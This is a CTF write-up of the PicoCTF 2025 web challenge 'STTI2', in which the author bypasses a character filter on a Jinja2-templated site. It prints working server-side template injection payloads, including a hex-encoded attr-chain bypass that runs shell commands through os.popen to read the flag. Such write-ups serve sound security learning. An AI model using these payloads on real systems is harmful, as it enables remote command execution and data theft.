🌐 STTI2
A detailed write-up of the Web challenge 'STTI2' from PicoCTF - 2025
📊 Challenge Overview
Category Details Additional Info 🏆 Event PicoCTF - 2025 Event Link 🔰 Category Web 🌐 💎 Points 200 Out of 500 total ⭐ Difficulty 🟡 Medium Personal Rating: 1/10 👤 Author Venax Profile 🎮 Solves (At the time of flag submission) 542 solve rate 📅 Date 10-03-2025 PicoCTF - 2025 🦾 Solved By mH4ck3r0n3 Team:
📝 Challenge Information
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :) I heard templating is a cool and modular way to build web apps! Check out my website here!
🎯 Challenge Files & Infrastructure
Provided Files
1
Files: None
🔍 Initial Analysis
First Steps
Initially, the website appears as follows:
This is version two of the challenge STTI1. Sending the same payload as in the previous challenge,
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
, I get:So it looks like a filter has been added… Let’s move on to the exploitation phase.
🔬 Vulnerability Analysis
Potential Vulnerabilities
- SSTI (Server Side Template Injection)
🎯 Solution Path
Exploitation Steps
Exploitation
Usually, to bypass filters, characters like
_
are encoded in hex, andattr|
is used instead of.
to build the object chain since some filters might block_
and.
. So, I found a payload on HackTricks that already encodes these characters:
"{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}"
I executed
cat flag
directly, given the previous challenge. By printing the contents of theflag
file, I successfully retrieved the flag.
Flag capture
🛠️ Exploitation Process
Approach
The automatic exploit is identical to the one from the previous challenge. It sends the
SSTI
payload with a POST request and then extracts the flag from the response using a regex.
🚩 Flag Capture
Flag
Proof of Execution
🔧 Tools Used
Tool Purpose Python Exploit
💡 Key Learnings
Skills Improved
- Binary Exploitation
- Reverse Engineering
- Web Exploitation
- Cryptography
- Forensics
- OSINT
- Miscellaneous
📚 References & Resources
Learning Resources
📊 Final Statistics
Metric | Value | Notes |
---|---|---|
Time to Solve | 00:02 | From start to flag |
Global Ranking (At the time of flag submission) | 2122/8400 | Challenge ranking |
Points Earned | 200 | Team contribution |
Created: 10-03-2025 • Last Modified: 10-03-2025 *Author: mH4ck3r0n3 • Team: *